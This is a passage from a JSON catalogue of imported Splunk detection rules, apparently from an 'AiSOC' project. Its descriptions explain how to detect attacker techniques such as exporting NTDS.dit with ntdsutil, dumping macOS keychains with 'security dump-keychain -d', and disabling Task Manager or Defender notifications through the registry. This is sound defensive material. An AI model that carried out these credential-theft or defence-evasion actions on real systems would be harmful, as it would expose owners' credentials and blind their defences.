If confirmed malicious, this behavior could lead to further attacks aimed at compromising privileged accounts, escalating privileges, or gaining unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sensitive-group-discovery-with-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d9eb7cda-5622-4722-bc88-7f2442f4b5af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sensitive_group_discovery_with_net.yml" } }, { "id": "splunk-security-content-da20828e-d6fb-4ee5-afb7-d0ac200923d5", "type": "detection", "name": "GCP Multiple Users Failing To Authenticate From Ip", "description": "The following analytic detects a single source IP address failing to authenticate into more than 20 unique Google Workspace user accounts within a 5-minute window. It leverages Google Workspace login failure events to identify potential password spraying attacks. This activity is significant as it may indicate an adversary attempting to gain unauthorized access or elevate privileges within the Google Cloud Platform. 
If confirmed malicious, this behavior could lead to unauthorized access to sensitive resources, data breaches, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "da20828e-d6fb-4ee5-afb7-d0ac200923d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-da355155-1d23-48f9-bf95-e534ae273ab0", "type": "detection", "name": "Windows Chrome Enable Extension Loading via Command-Line", "description": "The following analytic detects instances where Google Chrome is started with the --disable-features=DisableLoadExtensionCommandLineSwitch flag, effectively enabling the loading of extensions via the command line.\nThis may indicate attempts to bypass enterprise extension policies, load unauthorized or malicious extensions, or manipulate browser behavior.\nMonitoring this activity helps identify potential security policy violations, malware persistence techniques, or other suspicious Chrome modifications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", 
"tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chrome-enable-extension-loading-via-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "da355155-1d23-48f9-bf95-e534ae273ab0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chrome_enable_extension_loading_via_command_line.yml" } }, { "id": "splunk-security-content-da63bc76-61ae-11eb-ae93-0242ac130002", "type": "detection", "name": "Ntdsutil Export NTDS", "description": "The following analytic detects the use of Ntdsutil to export the Active Directory database (NTDS.dit). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because exporting NTDS.dit can be a precursor to offline password cracking, posing a severe security risk. 
If confirmed malicious, an attacker could gain access to sensitive credentials, potentially leading to unauthorized access and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ntdsutil-export-ntds.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "da63bc76-61ae-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ntdsutil_export_ntds.yml" } }, { "id": "splunk-security-content-dac279bc-9202-11eb-b7fb-acde48001122", "type": "detection", "name": "Disabling Task Manager", "description": "The following analytic identifies modifications to the Windows registry that disable Task Manager. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskMgr\" with a value of \"0x00000001\". This activity is significant as it is commonly associated with malware such as RATs, Trojans, and worms, which disable Task Manager to prevent users from terminating malicious processes. 
If confirmed malicious, this could allow attackers to maintain persistence and control over the infected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-task-manager.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dac279bc-9202-11eb-b7fb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_task_manager.yml" } }, { "id": "splunk-security-content-daed6823-b51c-4843-a6ad-169708f1323e", "type": "detection", "name": "Windows Service Deletion In Registry", "description": "The following analytic detects the deletion of a service from the Windows Registry under CurrentControlSet\\Services. It leverages data from the Endpoint.Registry datamodel, specifically monitoring registry paths and actions related to service deletion. This activity is significant as adversaries may delete services to evade detection and hinder incident response efforts. 
If confirmed malicious, this action could disrupt legitimate services, impair system functionality, and potentially allow attackers to maintain a lower profile within the environment, complicating detection and remediation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-deletion-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "daed6823-b51c-4843-a6ad-169708f1323e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_deletion_in_registry.yml" } }, { "id": "splunk-security-content-db02d6b4-5d5b-4c33-8d8f-f0577516a8c7", "type": "detection", "name": "Windows Credentials from Password Stores Query", "description": "The following analytic detects the execution of the Windows OS tool cmdkey.exe, which is often abused by post-exploitation tools like winpeas, commonly used in ransomware attacks to list stored usernames, passwords, or credentials. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant as it indicates potential credential harvesting, which can lead to privilege escalation and persistence. 
If confirmed malicious, attackers could gain unauthorized access to sensitive information and maintain control over compromised systems for further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "db02d6b4-5d5b-4c33-8d8f-f0577516a8c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_query.yml" } }, { "id": "splunk-security-content-db435700-4ddc-4c23-892e-49e7525d7d39", "type": "detection", "name": "O365 Privileged Role Assigned", "description": "The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment. 
This detection leverages the O365 Universal Audit Log data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-privileged-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "db435700-4ddc-4c23-892e-49e7525d7d39", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_privileged_role_assigned.yml" } }, { "id": "splunk-security-content-db596056-3019-11ec-a9ff-acde48001122", "type": "detection", "name": "Disable Schedule Task", "description": "The following analytic detects the execution of a command to disable an existing scheduled task using 'schtasks.exe' with the '/change' and '/disable' parameters. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Disabling scheduled tasks is significant as it is a common tactic used by adversaries, including malware like IcedID, to disable security applications and evade detection. 
If confirmed malicious, this activity could allow attackers to persist undetected, disable critical security defenses, and further compromise the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-schedule-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "db596056-3019-11ec-a9ff-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_schedule_task.yml" } }, { "id": "splunk-security-content-dbbbe26f-83fe-4ee3-8b77-ccf7fbd416c8", "type": "detection", "name": "ESXi Encryption Settings Modified", "description": "Detects the disabling of critical encryption enforcement settings on an ESXi host, such as secure boot or executable verification requirements, which may indicate an attempt to weaken hypervisor integrity or allow unauthorized code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-encryption-settings-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbbbe26f-83fe-4ee3-8b77-ccf7fbd416c8", "source_commit": 
"4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_encryption_settings_modified.yml" } }, { "id": "splunk-security-content-dbdd251e-dd45-4ec9-a555-f5e151391746", "type": "detection", "name": "Windows Office Product Dropped Cab or Inf File", "description": "The following analytic detects Office products writing .cab or .inf files, indicative of CVE-2021-40444 exploitation. It leverages the Endpoint.Processes and Endpoint.Filesystem data models to identify Office applications creating these file types. This activity is significant as it may signal an attempt to load malicious ActiveX controls and download remote payloads, a known attack vector. If confirmed malicious, this could lead to remote code execution, allowing attackers to gain control over the affected system and potentially compromise sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-dropped-cab-or-inf-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbdd251e-dd45-4ec9-a555-f5e151391746", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_dropped_cab_or_inf_file.yml" } }, { "id": "splunk-security-content-dbdd556d-9da8-4c42-9980-8a3ffe25a758", "type": "detection", "name": "Windows File Collection Via Copy Utilities", "description": "The 
following analytic detects the use of Windows command-line copy utilities, such as xcopy, to systematically collect files from user directories and consolidate them into a centralized location on the system. This activity is often indicative of malicious behavior, as threat actors frequently use such commands to gather sensitive information, including documents with .doc, .docx, and .pdf extensions. The detection focuses on identifying recursive copy operations targeting user folders, such as Documents, Desktop, or other directories that commonly store personal or organizational files. Malware that performs this behavior typically attempts to evade detection by using legitimate Windows utilities, executing commands through cmd.exe or other scripting hosts, and writing the collected files to directories like C:\\ProgramData or temporary storage locations. Once collected, the information may be staged for exfiltration, used for lateral movement, or leveraged for further compromise of the environment. By monitoring for these types of file collection patterns, security teams can identify suspicious activity early, differentiate between normal administrative tasks and potentially malicious scripts, and prevent sensitive data from being exfiltrated. 
This analytic is particularly relevant for environments where confidential documents are present and attackers may attempt to harvest them using built-in Windows tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-collection-via-copy-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbdd556d-9da8-4c42-9980-8a3ffe25a758", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_collection_via_copy_utilities.yml" } }, { "id": "splunk-security-content-dbfca1dd-b8e5-4ba4-be0e-e565e5d62002", "type": "detection", "name": "Amazon EKS Kubernetes Pod scan detection", "description": "The following analytic detects unauthenticated requests made against the Kubernetes Pods API, indicating potential unauthorized access attempts. It leverages the `aws_cloudwatchlogs_eks` data source, filtering for events where `user.username` is \"system:anonymous\", `verb` is \"list\", and `objectRef.resource` is \"pods\", with `requestURI` set to \"/api/v1/pods\". This activity is significant as it may signal attempts to access sensitive resources or execute unauthorized commands within the Kubernetes environment. 
If confirmed malicious, such access could lead to data compromise, unauthorized command execution, or lateral movement within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/amazon-eks-kubernetes-pod-scan-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dbfca1dd-b8e5-4ba4-be0e-e565e5d62002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/amazon_eks_kubernetes_pod_scan_detection.yml" } }, { "id": "splunk-security-content-dc02c0ee-6ac0-4c7f-87ba-8ce43a4e4418", "type": "detection", "name": "Azure AD Tenant Wide Admin Consent Granted", "description": "The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. This activity is significant because admin consent allows applications to access data across the entire tenant, potentially exposing vast amounts of organizational data. 
If confirmed malicious, an attacker could gain extensive and persistent access to sensitive data, leading to data exfiltration, espionage, further malicious activities, and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-tenant-wide-admin-consent-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc02c0ee-6ac0-4c7f-87ba-8ce43a4e4418", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_tenant_wide_admin_consent_granted.yml" } }, { "id": "splunk-security-content-dc1457d0-1d9b-422e-b5a7-db46c184d9aa", "type": "detection", "name": "Network Share Discovery Via Dir Command", "description": "The following analytic detects access to Windows administrative SMB shares (Admin$, IPC$, C$) using the 'dir' command. It leverages Windows Security Event Logs with EventCode 5140 to identify this activity. This behavior is significant as it is commonly used by tools like PsExec/PaExec for staging binaries before creating and starting services on remote endpoints, a technique often employed by adversaries for lateral movement and remote code execution. 
If confirmed malicious, this activity could allow attackers to propagate malware, such as IcedID, across the network, leading to widespread infection and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-share-discovery-via-dir-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc1457d0-1d9b-422e-b5a7-db46c184d9aa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_share_discovery_via_dir_command.yml" } }, { "id": "splunk-security-content-dc167f8b-3f9d-4460-9c98-8b6e703fd628", "type": "detection", "name": "Windows EventLog Recon Activity Using Log Query Utilities", "description": "This analytic detects EventLog reconnaissance activity using utilities such as `wevtutil.exe`, `wmic.exe`, PowerShell cmdlets like `Get-WinEvent`, or WMI queries targeting `Win32_NTLogEvent`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. These tools are often used by adversaries to extract usernames, IP addresses, session data, and event information for credential access or situational awareness during lateral movement. While these utilities are legitimate, execution with specific arguments or targeting sensitive logs like `Security`, `PowerShell`, or specific EventIDs (e.g., 4624, 4778) can indicate malicious intent. 
If confirmed malicious, this behavior could allow an attacker to extract sensitive information and potentially leverage that access or move laterally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1654" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-eventlog-recon-activity-using-log-query-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc167f8b-3f9d-4460-9c98-8b6e703fd628", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_eventlog_recon_activity_using_log_query_utilities.yml" } }, { "id": "splunk-security-content-dc2f58bc-8cd2-4e51-962a-694b963acde0", "type": "detection", "name": "Windows AD Privileged Object Access Activity", "description": "The following analytic detects access attempts to privileged Active Directory objects, such as Domain Admins or Enterprise Admins. It leverages Windows Security Event Code 4662 to identify when these sensitive objects are accessed. This activity is significant because such objects should rarely be accessed by normal users or processes, and unauthorized access attempts may indicate attacker enumeration or lateral movement within the domain. 
If confirmed malicious, this activity could allow attackers to escalate privileges, persist in the environment, or gain control over critical domain resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-privileged-object-access-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc2f58bc-8cd2-4e51-962a-694b963acde0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_privileged_object_access_activity.yml" } }, { "id": "splunk-security-content-dc4dc3a8-ff54-11eb-8bf7-acde48001122", "type": "detection", "name": "Gsuite Outbound Email With Attachment To External Domain", "description": "The following analytic detects outbound emails with attachments sent from an internal email domain to an external domain. It leverages Gsuite Gmail logs, parsing the source and destination email domains, and flags emails with fewer than 20 outbound instances. This activity is significant as it may indicate potential data exfiltration or insider threats. 
If confirmed malicious, an attacker could use this method to exfiltrate sensitive information, leading to data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-outbound-email-with-attachment-to-external-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc4dc3a8-ff54-11eb-8bf7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_outbound_email_with_attachment_to_external_domain.yml" } }, { "id": "splunk-security-content-dc64d064-d346-11eb-8588-acde48001122", "type": "detection", "name": "Execute Javascript With Jscript COM CLSID", "description": "The following analytic detects the execution of JavaScript using the JScript.Encode CLSID (COM Object) by cscript.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and parent processes. This activity is significant as it is a known technique used by ransomware, such as Reddot, to execute malicious scripts and potentially disable AMSI (Antimalware Scan Interface). 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, evade detection, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/execute-javascript-with-jscript-com-clsid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc64d064-d346-11eb-8588-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/execute_javascript_with_jscript_com_clsid.yml" } }, { "id": "splunk-security-content-dc65678c-301f-11ec-8e30-acde48001122", "type": "detection", "name": "Disable Defender Enhanced Notification", "description": "The following analytic detects the modification of the registry to disable Windows Defender's Enhanced Notification feature. It leverages data from Endpoint Detection and Response (EDR) agents, specifically monitoring changes to the registry path associated with Windows Defender reporting. This activity is significant because disabling Enhanced Notifications can prevent users and administrators from receiving critical security alerts, potentially allowing malicious activities to go unnoticed. 
If confirmed malicious, this action could enable an attacker to bypass detection mechanisms, maintain persistence, and escalate their activities without triggering alerts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-enhanced-notification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc65678c-301f-11ec-8e30-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_enhanced_notification.yml" } }, { "id": "splunk-security-content-dc6a5613-d024-47e7-9997-ab6477a483d3", "type": "detection", "name": "Windows Impair Defenses Disable Auto Logger Session", "description": "The following analytic detects the disabling of an AutoLogger session or one of its providers, by identifying changes to the Registry values \"Start\" and \"Enabled\" part of the \"\\WMI\\Autologger\\\" key path. It leverages data from the Endpoint.Registry datamodel to monitor specific registry paths and values. This activity is significant as attackers and adversaries can leverage this in order to evade defense and blind EDRs and log ingest tooling. 
If confirmed malicious, this action could allow an attacker to conceal their activities, making it harder to detect further malicious actions and maintain persistence on the compromised endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-auto-logger-session.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc6a5613-d024-47e7-9997-ab6477a483d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_auto_logger_session.yml" } }, { "id": "splunk-security-content-dc7a8004-0f18-11ec-8c54-acde48001122", "type": "detection", "name": "Bcdedit Command Back To Normal Mode Boot", "description": "The following analytic detects the execution of a suspicious `bcdedit` command that reconfigures a host from safe mode back to normal boot. This detection leverages Endpoint Detection and Response (EDR) data, focusing on command-line executions involving `bcdedit.exe` with specific parameters. This activity is significant as it may indicate the presence of ransomware, such as BlackMatter, which manipulates boot configurations to facilitate encryption processes. 
If confirmed malicious, this behavior could allow attackers to maintain control over the boot process, potentially leading to further system compromise and data encryption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bcdedit-command-back-to-normal-mode-boot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dc7a8004-0f18-11ec-8c54-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml" } }, { "id": "splunk-security-content-dcb45a09-5e6f-441e-b2f8-cbbf923e36d9", "type": "detection", "name": "MacOS Keychains Dumped", "description": "Detects command-line attempts to access or dump macOS Keychain data using native utilities or direct file access.\nThis includes credential dumping via the `security` utility (e.g. 
`dump-keychain -d`), bulk certificate export using `security find-certificate`, and direct file copying of Keychain database files using utilities such as `cat`.\nKeychain files are located in `~/Library/Keychains/`, `/Library/Keychains/`, and `/Network/Library/Keychains/`.\nThis technique is commonly associated with post-exploitation credential harvesting, where an attacker with local access seeks to escalate privileges or move laterally by obtaining stored credentials for applications, Wi-Fi networks, system services, and certificates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1555.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-keychains-dumped.yaml", "provenance": { "source": "splunk/security_content", "source_id": "dcb45a09-5e6f-441e-b2f8-cbbf923e36d9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_keychains_dumped.yml" } }, { "id": "splunk-security-content-dcc89bde-5f24-11ec-87ca-acde48001122", "type": "detection", "name": "Linux Possible Cronjob Modification With Editor", "description": "The following analytic detects potential unauthorized modifications to Linux cronjobs using text editors like \"nano,\" \"vi,\" or \"vim.\" It identifies this activity by monitoring command-line executions that interact with cronjob configuration paths. This behavior is significant for a SOC as it may indicate attempts at privilege escalation or establishing persistent access. 
If confirmed malicious, the impact could be severe, allowing attackers to execute damaging actions such as data theft, system sabotage, or further network penetration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-cronjob-modification-with-editor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcc89bde-5f24-11ec-87ca-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_cronjob_modification_with_editor.yml" } }, { "id": "splunk-security-content-dcf74b22-7933-11ec-857c-acde48001122", "type": "detection", "name": "Windows InstallUtil in Non Standard Path", "description": "The following analytic detects the execution of InstallUtil.exe from 